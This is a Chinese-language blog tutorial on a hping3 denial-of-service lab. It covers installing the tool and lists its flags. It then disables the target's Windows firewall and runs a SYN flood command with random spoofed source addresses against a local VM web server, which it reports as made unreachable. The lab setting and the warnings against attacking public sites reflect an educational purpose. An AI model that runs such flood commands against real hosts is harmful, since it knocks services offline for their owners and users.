赞
踩
Hping3 拒绝服务攻击实验
*请遵守网络安全法!不要攻击公网设备和网站!!
hping3是一款网络探测和攻击工具,其主要用途是进行网络测试和攻击,例如探测端口、分析网络性能、模拟网络流量等,它是用于对防火墙和网络执行安全审计和测试的工具之一,本身是一个安全测试工具,也可以被用作攻击工具使用,进行数据泛洪,从而引起拒绝服务
以下是本篇文章正文内容,下面案例可供参考
1.Kali Linux
如果你的使用的机器是Kali Linux版本,那么hping3已经默认在系统内安装
2.其他Linux发行版
sudo apt-get update //更新软件包列表
sudo apt-get upgrade //对已经安装的软件包本身进行更新
sudo apt-get install hping3 //安装hping3工具
yum -y install libpcap-devel tcl-devel //安装libpcap-devel和tcl-devel
git clone https://github.com/antirez/hping.git //从GitHub上clone源代码
cd hping //进入hping目录
./configure //运行配置脚本
make install //编译安装
以下是hping3的一些常用参数,以及它们的含义:
-c:设置发送数据包的数量 -d:设置每个数据包的大小 -i :设置数据包之间的时间间隔 -w:设置TCP窗口大小 -a:设置发起数据包的源IP地址 -k:保留root权限使用 -q:只输出关键信息到stdout -p:设置目标端口,缺省为0 -S:表示发送TCP SYN包 -F:表示发送TCP FIN包 -P:表示发送ICMP包 --help:查看帮助信息 --fast:快速扫描模式 --flood:发送数据包并不等待响应(洪水攻击) --rand-dest:随机化目标IP地址 --rand-source:随机源地址模式 --udp:发送UDP包 --tcp-timestamp:设置TCP包时间戳 --traceroute:扫描路径中的每个路由器
这里只选择了一些较为常用的参数 ↑
攻击机:kali虚拟机 192.168.36.129
靶 机:win8.1 192.168.36.130
点击“打开网络和共享中心”(不同系统各不相同,但都是一个思路)
点击“Windows防火墙”
点击“启用或关闭Windows防火墙”
设置完成后点确定就好了
好了,这样就成功关闭防火墙了!
这里我用自己本地搭建的一个网站来进行实验
ip:192.168.36.130
127.0.0.1 为本地回环地址(相当于输入了我们自己的ip)
现在我们进入我们的攻击机,对我们自己的网站进行一个攻击
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.36.130
hping3:应用名称
-c 1000:需要发送的包(packets)的数量(非必须)
-d 120:包(packets)的大小(非必须)
-S:只发送SYN packets
-w 64:TCP窗口(Windows)的大小(非必须)
-p 80:80端口(根据实际情况修改即可)
–flood:泛洪攻击模式
–rand-source:伪造随机的源IP地址
ip / 域名(xxx.com):需要攻击的目标ip或主机域名(最好不要带htts:// 和 www)
当我们在kali中开始攻击不久后,回到我们的主机,发现网站已经无法进入(ctrl+c可结束攻击)
以上就是今天要介绍的实验,本文仅仅简单介绍了hping3的使用,还有很多攻击方式,如:TCP Flood、UDP Flood等,大家可以自行尝试(不要攻击别人的网站*)感谢大家的观看,欢迎大家批评指正,不断学习中!
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。